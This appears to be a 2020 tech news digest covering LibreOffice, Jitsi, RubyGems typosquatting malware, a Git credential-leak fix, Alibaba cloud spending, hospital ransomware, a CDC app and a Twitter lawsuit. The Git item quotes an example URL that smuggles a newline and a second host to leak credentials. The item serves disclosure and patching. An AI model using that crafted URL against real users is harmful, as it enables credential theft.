When you are working with multiple workbooks or worksheets, it is often needed to refer back or retrieve data from different workbooks into the current workbook. This helps to keep your work modular and less complex. In LibreOffice Calc, you can achieve it using an external reference.

Thanks to the sponsorship of VFOSSA (Vietnam Free Open Source Software Association), CoMeet Alliance has officially launched the "made in Vietnam" consulting, design, integration, support and maintenance video conference (online meeting) solutions on open source platform Jitsi in April 2020.

As we spend more time on videoconferences, concerns mount about trust. Emil Ivov says you shouldn't have to trust anyone.

Security and Proprietary Issues Bitcoin stealer infected 700+ libraries of major programming language A cybersecurity firm discovered that over 700 libraries of the popular programming language, Ruby, contained malicious Bitcoin-stealing software. ReversingLabs, based in Cambridge, Massachusetts, disclosed its findings in a blog post on Thursday. Back in February, it wrote, hackers placed malicious files inside a package manager called RubyGems—which is usually used to upload and share improvements on existing pieces of software. The hackers were trying to trick developers into downloading malware by using a method called “typosquatting”, which consists of uploading malicious packages with similar names to regular ones. By just changing a few characters of a file name, the hope was that a developer would mistakenly download an infected package—unwittingly providing the hacker with access to their system.

This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack: url = "https://one.example.com?%0ahost=two.example.com/foo.git" So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.

Alibaba to Invest $28 Billion Over Three Years in Cloud The Chinese e-commerce giant plans to build more datacenters to complement an existing network covering 21 regions around the world, the company said in a statement. It will continue to develop its own technologies in areas such as AI-inference chips to support that expansion in cloud services, it added.

Hospitals brace for increase in cyberattacks As hospitals face a surge in patients and critical equipment shortages stemming from the coronavirus pandemic, they are increasingly becoming the target of [attackers] who see health care facilities as easy prey. Ransomware attacks, in which [attackers] lock up a network and demand payment to return access to these systems, have presented a growing threat to hospitals since January. Experts are warning that they expect these attacks to increase and that the threat has captured the attention of top intelligence lawmakers, who warn the outbreak and the ransomware attacks create the perfect storm.

CDC plans to roll out app in May to speed up COVID-19 case reporting The Centers for Disease Control and Prevention (CDC) plans to roll out an app in May that will accelerate electronic case reporting of COVID-19 cases. The app, based on Fast Healthcare Interoperability Resources (FHIR) standards, can be implemented quickly to automate COVID case reporting, said Laura Conn, health scientist and eCR lead in the CDC's Center for Surveillance, Epidemiology, and Laboratory Services. The app enables healthcare providers that don't have the capability to automatically send case reports from their health IT systems to more efficiently send data to public health agencies.

Judge dismisses Twitter lawsuit pushing to reveal US surveillance requests Rogers clarified that the government’s use of confidential declarations convinced her that unearthing the exact number of national security letters dating back to 2014, as requested by Twitter, would put national security at risk.